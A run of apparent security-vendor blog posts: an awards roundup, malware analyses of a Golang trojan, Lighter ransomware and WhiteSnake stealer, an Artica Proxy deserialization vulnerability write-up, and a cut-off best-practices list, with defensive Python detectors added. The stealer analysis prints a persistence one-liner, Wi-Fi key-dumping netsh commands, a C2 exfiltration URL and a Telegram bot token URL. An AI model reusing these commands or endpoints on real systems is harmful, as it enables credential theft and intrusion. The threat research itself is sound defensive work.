Kicking Off Another Winning Year

The past year has been filled with wins here at SonicWall. We revamped our SecureFirst Partner Program, made important additions to the SonicWall family in Solutions Granted and Banyan, and triumphed in countless other ways. Perhaps most importantly, we continued to strive for excellence in all we do.

And this isn’t just us singing our own praises — plenty of others have taken note of all the great things happening at SonicWall, and our hard work has paid off. With that, we’re thrilled to announce the awards won by SonicWall and SonicWall leaders for an incredible job in 2023!

SonicWall Corporate Awards

Each year, solution and service providers look to the CRN Partner Program Guide to determine which partner programs offer not only the most robust product portfolios but also the best incentives to help partners succeed. The most esteemed award a company can receive in this category is the 5-Star Award, and we’re happy to announce that SonicWall has been given the 5-Star Award in the 2024 CRN Partner Program Guide.

SonicWall was also named as a finalist in the SC Awards’ Best SME Security Solution category for our TZ Series next-generation firewalls (NGFWs). To cap things off, SonicWall was named to CRN’s 20 Coolest Network Security Companies of 2024 list.

CRN Channel Chiefs

Each year, CRN’s editorial staff names Channel Chiefs based on factors such as professional accomplishments, industry standing and sheer dedication to the channel partner community. This list is reserved for those leaders who are truly making an impact through excellent innovation and strategy in the channel. We’re over the moon to have three such individuals on our team here at SonicWall. Help us congratulate our CRN Channel Chiefs for 2024:

  • Jason Carter, Chief Revenue Officer
  • Michelle Ragusa-McBain, Global Channel Chief
  • Spencer Starkey, Vice President of Sales, EMEA

Michelle Ragusa-McBain

Along with being named a CRN Channel Chief, SonicWall’s Michelle Ragusa-McBain showed exactly why she’s our Global Channel Chief, earning enough awards to have a section of her own:

  • Channel Futures’ 2024 Circle of Excellence
  • Channel Futures’ 2024 Channel Influencer
  • CRN’s Woman of the Year Finalist
  • CRN’s Channel Madness Finalist

Way to go, Michelle!

Looking Ahead

Thank you to all SonicWall team members and partners for your contributions and incredible efforts this past year. Without you all, none of these awards would be possible. We hope to make 2024 even better than 2023, and we’re looking forward to continuing to celebrate our progress and one another!

Here’s to a great year ahead!

New Golang Trojan Installs Certificate for Comms Evasion

Overview

This week, the SonicWall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate in the Windows registry for HTTPS communication with the C2. There is currently no malware family affiliated with it, but the IP and URL addresses have been used by AgentTesla, GuLoader, PureLog Stealer and others.

Technical Analysis

The sample is detected as a Golang 64-bit executable with a WinAuth certificate. The timestamp has been tampered with, as it shows a creation date of December 31, 1969.

Figure 1: Sample detection with Detect It Easy

The certificate listed is issued from ‘RUNNINGWITHSCISSORS LTD’ but does not have an issuer signatory.

Figure 2: There is no signer, email or creation date with this certificate

Looking at the sample, one section included is non-standard, .symtab; this section is associated with ELF/Linux files and should not be on a Windows executable.

Figure 3: This is a Linux file-type section and would not be accessed by normal means

Because of the way Golang compiles binaries, the Go pclntab (gopclntab) had to be reconstructed in order to see the inner workings of the file.

Figure 4: Malware functions in cleartext

Once done, there are several items of note. Newly renamed functions list out the primary methods of . The strings show a pattern that looks to be used to send system information to the attacker – this is confirmed later. This pattern contains information for a system UUID, remote IP, username, hostname, Windows version, process ID, process name and architecture.

Figure 5: There is an ASCII pattern for information that may be sent to the attacker

Next, the packages reveal that the author is using public GitHub applications from the following repositories to generate and save screenshots:

Figure 6: These GitHub packages are public and are not malicious on their own

During runtime, the malware will start by querying main system information using process injection via VirtualAlloc and running WMIC. The following two commands are run first:

  • ‘SELECT UUID FROM Win32_ComputerSystemProduct’
  • C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Next, these registry keys are queried for the Windows version and hostname:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters

When attempting to control/open WMIC, the sample looked in the following locations, as well as trying to find a file with an unusual name:

  • C:\Users\user\Desktop
  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
  • C:\Windows
  • C:\Windows\system32
  • C:\Windows\Wbem\

Figure 7: Sample of locations WMIC is searched for along with an unusual file

Once WMIC has been launched, both the main executable and WMIC will load, or attempt to load, the following DLLs:

Apphelp.dll
Cryptbase.dll
Winmm.dll
Powrprof.dll
Umpdc.dll
Userenv.dll
Profapi.dll
Netapi32.dll
Wkscli.dll
Netutils.dll
Samcli.dll
Samlib.dll
Iphlpapi.dll
Dhcpcsvc6.dll
Dhcpcsvc.dll
Dnsapi.dll
Mswsock.dll
Rasadhlp.dll
Fwpuclnt.dll
Msasn1.dll
Cryptsp.dll
Rsaenh.dll
Gpapi.dll
Framedynos.dll
Sspicli.dll
Kernel.appcore.dll
Wbemcomm.dll
Msxml6.dll
Urlmon.dll
Iertutil.dll
Srvcli.dll
Uxtheme.dll
Vcruntime140.dll
Vcruntime140_1.dll
Amsi.dll
Vbscript.dll
sxs.dll

The majority of these were not used during testing, which means that they may be used after initial contact is made with the C2 for further data collection or additional malware utilities.

Figure 8: Sample listing of DLLs searched for by the trojan

When the sample reaches out on the network, it first looks up its public IP address using ‘ip-api.com/json’ and then makes initial contact with the C2 at ‘https://daily-mashriq[.]org/goyxdrkhjilchyigflztv’ using a ping.

Once those steps are complete, the malware installs a new root certificate by overriding data in the following registry key using ‘CertGetCertificateChain’:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Figure 9: Previous data being overwritten by the new certificate

Although the main functions go into detail about screenshots, there are also API calls in memory for tracking other Windows events. These are monitored with SetWindowsHookExW and TrackMouseEvent. Screenshots are created using the GitHub packages previously mentioned.

Figures 10, 11: Code showing that the ‘kbinani’ takes the screenshot, then ‘fogleman’ saves it.

A connection to ‘daily-mashriq[.]org’ is then attempted, sending the previously identified pattern of system information encrypted with ChaCha20 under the User-Agent “AGCYRNRWWWFZZSWWFWDYDCVDN”:

Figure 12: Encoded information sent to the C2

However, once the initial message has been POSTed, subsequent messages include only the UID and are sent every seven seconds.

Figure 13: Repeated POSTs contain only the UID

The following ports are also bound for listening: 49708-49711, 49720-49730, and 49733-49750.
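The fixed seven-second POST cadence and the constant User-Agent described above are what a network defender can key on. The following Python is an added example (not SonicWall's code) that groups POSTs in a constructed proxy log by client, host and User-Agent and flags groups whose inter-arrival times are nearly constant; the log lines, hosts and IP addresses are made up for the example, apart from the C2 domain and User-Agent taken from the analysis above.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Indicator from the analysis above: the fixed User-Agent on the C2 POSTs.
KNOWN_BAD_UA = "AGCYRNRWWWFZZSWWFWDYDCVDN"

# Constructed proxy log (not real captured traffic). Fields:
# timestamp client method host path user-agent
SAMPLE_LOG = """\
2024-03-20T10:00:00 10.0.0.5 POST daily-mashriq.org /goyxdrkhjilchyigflztv AGCYRNRWWWFZZSWWFWDYDCVDN
2024-03-20T10:00:03 10.0.0.9 GET www.example.com /index.html Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-03-20T10:00:07 10.0.0.5 POST daily-mashriq.org /goyxdrkhjilchyigflztv AGCYRNRWWWFZZSWWFWDYDCVDN
2024-03-20T10:00:14 10.0.0.5 POST daily-mashriq.org /goyxdrkhjilchyigflztv AGCYRNRWWWFZZSWWFWDYDCVDN
2024-03-20T10:00:19 10.0.0.9 POST www.example.com /login Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-03-20T10:00:21 10.0.0.5 POST daily-mashriq.org /goyxdrkhjilchyigflztv AGCYRNRWWWFZZSWWFWDYDCVDN
2024-03-20T10:00:28 10.0.0.5 POST daily-mashriq.org /goyxdrkhjilchyigflztv AGCYRNRWWWFZZSWWFWDYDCVDN
2024-03-20T10:00:52 10.0.0.9 POST www.example.com /login Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-03-20T10:01:20 10.0.0.9 POST www.example.com /api/save Mozilla/5.0 (Windows NT 10.0; Win64; x64)
2024-03-20T10:01:25 10.0.0.9 POST www.example.com /api/save Mozilla/5.0 (Windows NT 10.0; Win64; x64)
"""


def parse_log(text):
    """Parse the whitespace-separated log; the User-Agent is everything after the path."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, ua = line.split(maxsplit=5)
        records.append({
            "time": datetime.fromisoformat(ts),
            "client": client, "method": method, "host": host, "path": path, "ua": ua,
        })
    return records


def find_beacons(records, min_requests=4, max_jitter=1.0):
    """Return (client, host, UA) groups whose POST inter-arrival times are nearly constant.

    max_jitter is the largest population standard deviation (seconds) of the
    inter-arrival times that still counts as periodic. Human browsing produces
    irregular gaps and is not flagged; a timer-driven implant is.
    """
    groups = defaultdict(list)
    for r in records:
        if r["method"] == "POST":
            groups[(r["client"], r["host"], r["ua"])].append(r["time"])

    hits = []
    for (client, host, ua), times in groups.items():
        if len(times) < min_requests:
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if pstdev(deltas) <= max_jitter:
            hits.append({
                "client": client, "host": host, "ua": ua,
                "period": mean(deltas), "count": len(times),
                "known_bad_ua": ua == KNOWN_BAD_UA,
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{hit['client']} -> {hit['host']} every {hit['period']:.1f}s "
              f"x{hit['count']} UA={hit['ua']!r} known_bad_ua={hit['known_bad_ua']}")
```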

As of this writing, it appears that the domain has been blocked by (CHECK THIS).

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • MalAgent.Go.Trojan

IOCs

  • 8f4cf379ee2bef6b60fec792d36895dce3929bf26d0533fbb1fdb41988df7301
  • https://daily-mashriq.org/goyxdrkhjilchyigflztv
  • http://ip-api.com/json/

Unpatched PHP Deserialization Vulnerability in Artica Proxy

Overview

SonicWall Capture Labs threat research team became aware of a deserialization vulnerability with the Artica Proxy appliance, assessed its impact and developed mitigation measures. Artica Proxy is a comprehensive proxy solution performing tasks such as web filtering and categorization, SSL inspection, and bandwidth management. The vendor reports having over 100K servers installed around the world.

Identified as CVE-2024-2054, the administrative web interface allows the deserialization of any PHP objects provided by users without authentication, thereby allowing code to be executed under the “www-data” user account, earning an expected score of 9.8. This affects version 4.50 and all previous versions. While there are no reports of active exploitation currently, a publicly available PoC is provided by the Korelogic research team, and the vendor has not issued a patch yet. As a result, it is strongly encouraged that organizations follow the steps in the mitigation section below. SonicWall customers are already protected through IPS signature 19786, released on March 18th.

Technical Overview

While unauthenticated, a user can make an HTTP POST request to the “/wizard/wiz.wizard.progress.php” endpoint. This endpoint may receive the “build-js” query parameter as seen in Figure 1.

Figure 1: wiz.wizard.progress.php lines 10-16

When processing the “build-js” input, the endpoint base64-decodes it and passes the decoded value straight to PHP’s “unserialize” function, as seen in Figure 2.

Figure 2: wiz.wizard.progress.php build-js function

This is the root cause of the vulnerability, as an unauthenticated attacker can control the base64 encoded input which is then directly deserialized.

Triggering the Vulnerability

To trigger this vulnerability, an attacker must send an HTTP POST request to the Artica Proxy instance with the crafted “build-js” parameter set to a base64-encoded payload. Using the public PoC code as an example, this could be accomplished using the Linux “curl” command, as shown in Figure 3.

Figure 3: Triggering the vulnerability using curl

Exploitation

While triggering the vulnerable code path is simple, exploitation is slightly trickier. As with most deserialization attacks, execution is limited to what modules are installed on the system – in this case, PHP modules. An attacker must leverage these modules meaningfully to achieve the desired execution by deserializing serialized objects. When searching for a suitable object among the installed PHP modules, the “Net_DNS2_Cache_File” destructor within the “Net_DNS2” library stands out, as shown in Figure 4.

Figure 4: Net_DNS2_Cache_File destructor file write

When a “Net_DNS2_Cache_File” object is destroyed, it may write a file to the disk. This indicates that an attacker can leverage creating and destroying this object to write a file to the system.  As PHP web shells are a common tool used by attackers, this is a likely choice for exploitation.

It is worth noting that the possibility of this destructor being leveraged by the attackers was reported in 2016 to the Net_DNS2 project on GitHub, tracked as issue 50.

Figure 5: GitHub Issue reporting vulnerable code

The Net_DNS2 project mitigated the issue several months later in 2016; however, Artica Proxy ships an outdated version of the library, as can be seen in the DNS2.inc file on the filesystem.

Figure 6: Net_DNS2 class version on Artica Proxy

To illustrate exploitation, Figure 7 shows a segment where an unauthenticated user manages to overwrite the existing “wiz.upload.php” file. The clip first displays the original “wiz.upload.php” file and then shows the file overwritten by a simple web shell after exploitation. This is achieved by using a “Net_DNS2_Cache_File” object to embed the web shell, allowing the execution of harmful PHP code under the “www-data” user account. The payload executes the “whoami” command, confirming the user.

Figure 7: Successful exploitation
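Because the handler described in Technical Overview base64-decodes “build-js” and unserializes it with no class restriction, a reverse proxy or WAF in front of Artica can apply the check the application lacks: decode the parameter the same way and refuse any payload that declares a PHP object (such as the “Net_DNS2_Cache_File” gadget discussed above). The following Python is an added example (not Artica’s or KoreLogic’s code); the request bodies are constructed for the example, and the object payload carries placeholder properties only.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# Endpoint and parameter named in the write-up above.
VULN_PATH = "/wizard/wiz.wizard.progress.php"
VULN_PARAM = "build-js"

# Serialized PHP object header: O:<name length>:"<class name>":<property count>:{
PHP_OBJECT = re.compile(rb'O:(\d+):"([^"]*)":\d+:\{')


def php_object_classes(blob):
    """Return the class name of every PHP object declared in a serialized blob.

    Only headers whose declared length matches the class name are accepted,
    which filters out look-alike text inside ordinary string data.
    """
    classes = []
    for m in PHP_OBJECT.finditer(blob):
        length, name = int(m.group(1)), m.group(2)
        if len(name) == length:
            classes.append(name.decode("ascii", "replace"))
    return classes


def inspect_request(path, body):
    """Classify one POST to the wizard endpoint.

    Returns a dict with 'decision' in {'ignore', 'allow', 'block'} and a reason,
    so it can back a WAF rule or a log-review script. Plain serialized arrays
    (the only thing a progress wizard should need) are allowed; objects are not.
    """
    if path != VULN_PATH:
        return {"decision": "ignore", "reason": "not the vulnerable endpoint"}
    values = parse_qs(body).get(VULN_PARAM)
    if not values:
        return {"decision": "allow", "reason": f"no {VULN_PARAM} parameter"}
    try:
        decoded = base64.b64decode(values[0], validate=True)
    except (binascii.Error, ValueError):
        return {"decision": "block", "reason": "parameter is not valid base64"}
    classes = php_object_classes(decoded)
    if classes:
        return {"decision": "block", "classes": classes,
                "reason": "serialized PHP object(s): " + ", ".join(classes)}
    return {"decision": "allow", "classes": [], "reason": "no serialized objects"}


# Constructed sample bodies (not taken from the public PoC). The second declares the
# gadget class from the write-up but with a placeholder property, not its real fields.
BENIGN_BODY = urlencode({VULN_PARAM: base64.b64encode(b'a:1:{s:4:"step";i:3;}').decode()})
MALICIOUS_BODY = urlencode({VULN_PARAM: base64.b64encode(
    b'O:19:"Net_DNS2_Cache_File":1:{s:4:"prop";s:11:"placeholder";}').decode()})

if __name__ == "__main__":
    for body in (BENIGN_BODY, MALICIOUS_BODY):
        verdict = inspect_request(VULN_PATH, body)
        print(verdict["decision"], "-", verdict["reason"])
```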

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 19786 Artica Proxy PHP Deserialization

Remediation Recommendations

Unfortunately, no patch is currently available for this vulnerability. It is recommended to either remove the ‘/usr/share/artica-postfix/wizard’ directory (as it is not a critical component for the proxy to function properly) or move this directory outside of the web root folder. Doing so makes the vulnerable code inaccessible from the network, drastically reducing risk.

Lighter Ransomware Locks Users Out of System

Overview

This week, the SonicWall Capture Labs threat research team analyzed a ransomware calling itself Lighter Ransomware. Upon execution, it opens a window with a countdown timer instructing the victim to reach out immediately before the timer ends – or face greater consequences.

Infection Cycle

The malware arrives as a portable executable that, once executed, immediately displays this warning window.

Figure 1: Lighter ransomware window with countdown.

It lets the user know that they have been infected with ransomware and displays instructions on how to get their files back. Interestingly, this ransomware only asks for $100.

However, most common keyboard shortcuts are blocked, which renders the system unusable once this window is displayed.

Figure 2: Functionality showing keyboard shortcuts being blocked

Common system utilities such as Task Manager (taskmgr), cmd, msconfig, regedit and Process Explorer (procexp) are blocked.

Figure 3: Functionality that kills taskmgr

Meanwhile, files are encrypted with AES via the .NET RijndaelManaged class, and the malware appends the .L0cked extension to every encrypted file.

Figure 4: AES encryption functionality using the RijndaelManaged class

Figure 5: Encrypted files with the .L0cked file extension

This ransomware targets files with the following file extensions seen in the screenshot below:

Figure 6: File extensions targeted by this ransomware

Unless the user forces a reboot, they will be unable to do most common tasks while the warning window is displayed.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Lighter.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and Capture Client endpoint solutions.

WhiteSnake Stealer: Unveiling the Latest Version – Less Obfuscated, More Dangerous

Overview

SonicWall Capture Labs threat research team has observed a new variant of WhiteSnake Stealer. This stealer poses significant risks to users and organizations, as it can steal critical sensitive data from compromised systems, including web browser data, cryptocurrency wallets and much more. This new version has removed the string decryption code, making the code easy to understand.

Technical Analysis

After executing the file, the stealer verifies whether the mutex is already present to prevent two instances of the stealer from running simultaneously. The mutex value is specified in the stealer’s configuration. If the mutex is detected, the stealer terminates.

Figure 1: Performing mutex check

AntiVM

In this stealer, the AntiVM function is disabled by default (the flag is set to 0). If the flag is set to 1, it checks for the presence of sandboxes by issuing the WMI (Windows Management Instrumentation) query “SELECT * FROM Win32_ComputerSystem”, as shown below. From the result, the stealer reads the “Model” and “Manufacturer” properties and checks whether either contains any of the following strings:

  • virtual
  • vmbox
  • vmware
  • thinapp
  • VMXh
  • innotek gmbh
  • tpvcgateway
  • tpautoconnsvc
  • vbox
  • kvm
  • red hat
  • qemu

If any of these strings is present, the stealer exits.

Figure 2: Performing AntiVM check

Following the Anti-VM check, the malware invokes the Create() function, which in turn executes the ProcessCommands() function. This function is tailored to extract sensitive information from various sources, such as web browsers, messaging apps, FTP clients and cryptocurrency wallets, among others. ProcessCommands() is responsible for stealing “Cookies”, “Autofills”, “Login Data”, “History”, “Network\Cookies” and “Web Data” from the following web browsers:

  • Mozilla Firefox
  • Thunderbird
  • Google Chrome
  • YandexBrowser
  • Vivaldi
  • CocCoc Browser
  • CentBrowser
  • Brave Browser
  • Chromium
  • Microsoft Edge
  • Opera
  • OperaGX

Apart from stealing web browser data, WhiteSnake stealer has the capability to grab cryptocurrency wallets and crypto wallet browser extensions. The table below shows the targeted cryptocurrency wallets and browser extensions.

Cryptocurrency Wallets

Cryptocurrency Wallet Name   Targeted Directory
Ledger                       %AppData%\ledger live
Atomic                       %AppData%\atomic\Local Storage\leveldb
Wasabi                       %AppData%\WalletWasabi\Client\Wallets
Binance                      %AppData%\Binance
Guarda                       %AppData%\Guarda\Local Storage\leveldb
Coinomi                      %LocalAppData%\Coinomi\Coinomi\wallets
Bitcoin                      %AppData%\Bitcoin\wallets
Electrum                     %AppData%\Electrum\wallets
Electrum-LTC                 %AppData%\Electrum-LTC\wallets
Zcash                        %AppData%\Zcash
Exodus                       %AppData%\Exodus
JaxxLiberty                  %AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
JaxxClassic                  %AppData%\Jaxx\Local Storage\leveldb
Monero                       %UserProfile%\Documents\Monero\wallets

Table 1: Targeted Cryptocurrency Wallets

Crypto Wallet Browser Extensions

Extension Name   Browser Extension ID
Metamask         nkbihfbeogaeaoehlefnkodbefgpgknn
Ronin            fnjhmkhhmkbjkkabndcnnogagogbneec
BinanceChain     fhbohimaelbohpjbbldcngcnapndodjp
TronLink         ibnejdfjmmkpcnlpebklmnkoeoihofec
Phantom          bfnaelmomeimhlpmgjnjophhpkkoljpa

Table 2: Targeted Crypto Wallet Extensions

Persistence

In this version of WhiteSnake stealer, persistence is also disabled by default. If it is enabled, the stealer establishes persistence by copying itself into the %AppData% directory, deleting the original file and creating a scheduled task that runs the stealer every minute, as shown in the command below.

  • /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "WhiteSnake_Stealer" /sc MINUTE /tr "C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe" /rl LIMITED /f && DEL /F /S /Q /A "C:\Users\Administrator\Desktop\WhiteSnake_Stealer.exe" && START "" "C:\Users\Administrator\AppData\Local\RobloxSecurity\WhiteSnake_Stealer.exe"

Here, the “RobloxSecurity” folder name is already present in the stealer configuration file.

Figure 3: Stealer code for persistence and deleting itself

Capturing Screenshots

WhiteSnake stealer also has the capability to capture screenshots on the victim’s machine. Some part of the code responsible for this capability is shown in the figure below.

Figure 4: Capturing a screenshot from the victim’s machine

Keylogging

In this version of WhiteSnake stealer, keylogging is disabled by default. If it is enabled, or the attacker sends the command “KEYLOGGER”, the stealer captures keystrokes on the victim’s machine. To do so it needs the following Windows APIs, which it loads at run time:

  • UnhookWindowsHookEx
  • CallNextHookEx
  • GetKeyState
  • GetKeyboardState
  • GetKeyboardLayout
  • ToUnicodeEx
  • MapVirtualKeyA

Figure 5: Part of the code responsible for keylogging

Microphone

If an attacker sends the command MICROPHONE, then the WhiteSnake stealer first executes the “SELECT * FROM Win32_SoundDevice” WMI query to check whether the microphone is connected to the victim’s machine. If the microphone count is more than ‘0’, then microphone recording is started for a specified amount of time, as shown in the figure below.

Figure 6: Code responsible for microphone recording

Webcam

After the microphone recording, WhiteSnake stealer is also capable of grabbing webcam images. It uses the “SELECT * FROM Win32_PnPEntity WHERE (PNPClass = ‘Image’ OR PNPClass = ‘Camera’)” WMI query to count the webcams connected to the victim’s machine. If the count is equal to ‘1’, it tries to capture an image from the webcam and returns the image data as a byte array in PNG format.

Figure 7: Stealing webcam image

Targeting Apps

This stealer can also grab information from applications installed on the victim’s machine. As shown in the figure below, it targets email client applications such as Outlook and Foxmail.

Figure 8: Targeting email client applications

Remote Access

Another distinctive characteristic of WhiteSnake stealer is its remote terminal, enabling an attacker to initiate a remote session with the infected machine and execute specific commands, including:

  • UNINSTALL: Ceases operation and removes itself from the system.
  • PING: Executes a ‘ping’-like operation and replies with a ‘pong’.
  • REFRESH: Refresh the log credentials.
  • SCREENSHOT: Takes a screenshot of the victim’s screen.
  • DPAPI: Decrypts encrypted sensitive data stored on the victim’s system.
  • WEBCAM: Capture a photo using the webcam.
  • MICROPHONE: Record sound from victim’s microphone.
  • COMPRESS: Compresses directory into ZIP.
  • DECOMPRESS: Unzips the ZIP contents to the current directory.
  • TRANSFER: Uploads the file to an IP address from the configuration.
  • GET_FILE: Fetches the content of a designated file.
  • LIST_FILES: Lists files in the current directory.
  • LIST_PROCESSES: Get running processes list.
  • PROXY_SETUP: Downloads and exposes the chosen port.
  • KEYLOGGER: Capture keystrokes.
  • LOADEXEC: Retrieves a file from a distant location and runs it.

Wi-Fi

  • Retrieve Credentials:

The command “chcp 65001 && netsh wlan show profiles | findstr /R /C:"[ ]:[ ]"”, executed in a Windows command prompt, sets the code page to UTF-8 and lists the Wi-Fi profiles stored on the system, keeping only profiles that likely have passwords associated with them. For each such profile, it runs “chcp 65001 & netsh wlan show profiles name={0} key=clear | findstr "Key"” (with {0} replaced by the SSID) to retrieve the profile name and its stored password. It then Base64-decodes this information and writes it to the “Apps\WifiCredentials.txt” file.

  • Retrieve Nearby Networks:

The stealer does not stop after stealing Wi-Fi passwords. Next, it runs the command “chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"” to fetch information about the Wi-Fi networks visible from the compromised machine, specifically their names (SSID), unique identifiers (BSSID) and signal strength. It stores this information in the “Apps\WifiNearby.txt” file, as shown in the figure below.

Figure 9: Retrieving Wi-Fi credentials

System Information

WhiteSnake stealer gathers the victim’s system information, including username, machine name, operating system, tag, IP address, screen resolution, CPU name, graphics info, RAM size, disk size, model, manufacturer and more. Below is the list of WMI queries the stealer uses to fetch this information; each entry shows the query, the property read from the result and the fallback value used when the property is unavailable.

  • “SELECT * FROM Win32_Processor”, “Name”, “Unknown”
  • “SELECT * FROM Win32_VideoController”, “Name”, “Unknown”
  • “SELECT * FROM Win32_ComputerSystem”, “TotalPhysicalMemory”, “-1”
  • “SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3”
  • “SELECT * FROM Win32_ComputerSystem”, “Model”, “Unknown”
  • “SELECT * FROM Win32_ComputerSystem”, “Manufacturer”, “Unknown”

After collecting almost all system information, it collects all loaded DLL modules, all currently running processes and a list of all installed application names by querying the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall as shown in the figure below.

Figure 10: Code responsible for stealing processes and loaded DLLs from the victim’s system

Figure 11: Victim’s stolen data converted into XML format

When this collection of system information from the victim’s machine is complete, the stealer uses the XmlSerializer class to serialize the stolen information into XML. After serialization, it compresses the data and encrypts it with the RC4 algorithm using a randomly generated key. The key is generated with RNGCryptoServiceProvider().

Figure 12: Performing RC4 and RSA encryption

It is noteworthy that when the attacker has the RC4 + RSA encryption option enabled (by default), then the RC4 key is encrypted with RSA encryption, and the RSA public key is stored in the configuration.

Figure 13: RSA Public Key

Data Exfiltration

WhiteSnake stealer tries to send the victim’s stolen information to the attacker’s C&C, whose address is hard-coded in the stealer’s binary. First, it appends Base64-encoded stolen fields such as username and country to the C&C address to form a complete URL. Here is an example:

hxxp://45.61.137.41:8080/sendData?pk=MDE0RTc3QkZFM0Q4QjI3NkI5NjNFNjgyNUREQTZBNjk=&ta=RGVmYXVsdA==&un=WW9nZXNo&pc=V0lOLUs5NzNHTk9RSzBB&co=SW5kaWE=&wa=MA==&be=MA==

Figure 14: Trying to exfiltrate stolen information

Since this URL was down while this blog post was being written, the SendC2() function returns false. After this, the stealer creates a WSR file. Its filename begins with five random characters followed by _username, @computername and _report. The WSR file contains the exfiltrated data.

Here is an example of a WSR file name generated this way:

fTdXL_administrator@WIN-K973GNOQK0A_report.wsr
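For incident responders, the sendData URL and the WSR filename above are both worth parsing: the query string tells you which victim details already left the host, and the filename ties a recovered report to a user and machine. The following Python is an added example (not SonicWall’s or the stealer’s code) that refangs and decodes the sample URL shown above and extracts the user and host from a WSR filename; the meanings of the “pk”, “wa” and “be” fields are assumptions, since the write-up only names username, computer name and country.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Meaning of each query field. un/pc/co follow the write-up; the rest are assumptions
# based on the decoded values (pk decodes to a 32-character hex identifier, wa/be to "0").
FIELD_MEANING = {
    "pk": "build/public-key identifier (assumed)",
    "ta": "tag",
    "un": "username",
    "pc": "computer name",
    "co": "country",
    "wa": "feature flag (assumed)",
    "be": "feature flag (assumed)",
}

# <5 random chars>_<username>@<computername>_report.wsr
WSR_NAME = re.compile(
    r"^(?P<prefix>[A-Za-z0-9]{5})_(?P<user>[^@]+)@(?P<host>[^_]+)_report\.wsr$")

# Defanged URL quoted in the write-up above.
SAMPLE_URL = ("hxxp://45.61.137.41:8080/sendData?pk=MDE0RTc3QkZFM0Q4QjI3NkI5NjNFNjgyNUREQTZBNjk="
              "&ta=RGVmYXVsdA==&un=WW9nZXNo&pc=V0lOLUs5NzNHTk9RSzBB&co=SW5kaWE=&wa=MA==&be=MA==")


def refang(url):
    """Turn a defanged indicator (hxxp, [.]) into a parseable URL; drop trailing debris."""
    return url.replace("hxxp", "http").replace("[.]", ".").rstrip("}. ")


def decode_senddata_url(url):
    """Decode the Base64 fields of a WhiteSnake sendData URL; None if the path does not match."""
    parsed = urlparse(refang(url))
    if parsed.path != "/sendData":
        return None
    fields = {}
    # Split by hand rather than parse_qs: a '+' inside Base64 must not become a space.
    for part in parsed.query.split("&"):
        key, _, value = part.partition("=")
        try:
            fields[key] = base64.b64decode(value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            fields[key] = None  # keep the key so a reviewer sees it was present
    return {"c2": f"{parsed.hostname}:{parsed.port}", "fields": fields}


def parse_wsr_name(filename):
    """Return prefix, user and host from a WSR report filename, or None if it does not match."""
    m = WSR_NAME.match(filename)
    return m.groupdict() if m else None


if __name__ == "__main__":
    info = decode_senddata_url(SAMPLE_URL)
    print("C2:", info["c2"])
    for key, value in info["fields"].items():
        print(f"  {key} ({FIELD_MEANING.get(key, 'unknown')}): {value}")
    print(parse_wsr_name("fTdXL_administrator@WIN-K973GNOQK0A_report.wsr"))
```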

After this, the stealer again tries to upload the WSR log file to one of the servers listed in the configuration file. If a server is unavailable and the web request fails, the stealer attempts the next IP address on the list as shown below.

Figure 15: Trying to exfiltrate the WSR log file

Figure 16: Data exfiltration using PUT request

After successfully exfiltrating the stolen information to one of the attacker’s IP addresses, the stealer attaches tags such as OS version, country, username, computer name, the exfiltration file size and the IP the data was sent to, and sends this summary to the following Telegram bot URL:

hxxps://api[.]telegram[.]org/bot6889064496:AAHoMJK9ptSrhXHFUPG4rXCObxc34Q3oqzY/sendMessage?chat_id=1914807690.

Figure 17: Sending stolen information to Telegram Bot

SonicWall’s RTDMI engine detected this threat.

Indicators of Compromise (IOCs)

SHA256: 94048358360fd46766cdf1d4f487c1c61a391f97ebc10704c388170ae4e66b88

Nine Cybersecurity Best Practices for Local Governments

In its 2024 Cyber Threat Report, SonicWall found an alarming rise in malicious intrusion attempts and malware attacks, underscoring the heightened vulnerability of local governments. A common predicament compounds this situation: Many municipalities are under-resourced, struggling to equip their teams with the necessary staff, training, education and technology to counter these diverse and sophisticated threats effectively.

As local governments navigate the complex cybersecurity landscape, it’s crucial to lay a strong foundation. This blog outlines nine best practices local governments should implement to enhance their cybersecurity measures. With careful planning, thorough diligence and innovative strategies, these recommendations provide a roadmap for building robust protection against cyber threats.

1. Have a Plan

It’s critically important to have a plan encompassing the basic, foundational and organizational controls to protect, detect and respond to cyber incidents. Organizations like the Cybersecurity and Infrastructure Security Agency (CISA) offer resources for state, local, tribal and territorial governments that include more best practices, along with case studies to help government IT teams recognize and address cybersecurity risks.

2. Leverage the Resources of the NIST

The National Institute of Standards and Technology (NIST) offers invaluable resources for managing cybersecurity risks. The NIST’s cybersecurity framework is based on five pillars — identify, protect, detect, respond and recover — and is accompanied by online modules, examples, FAQs and more, all available for free.

3. Get Insurance

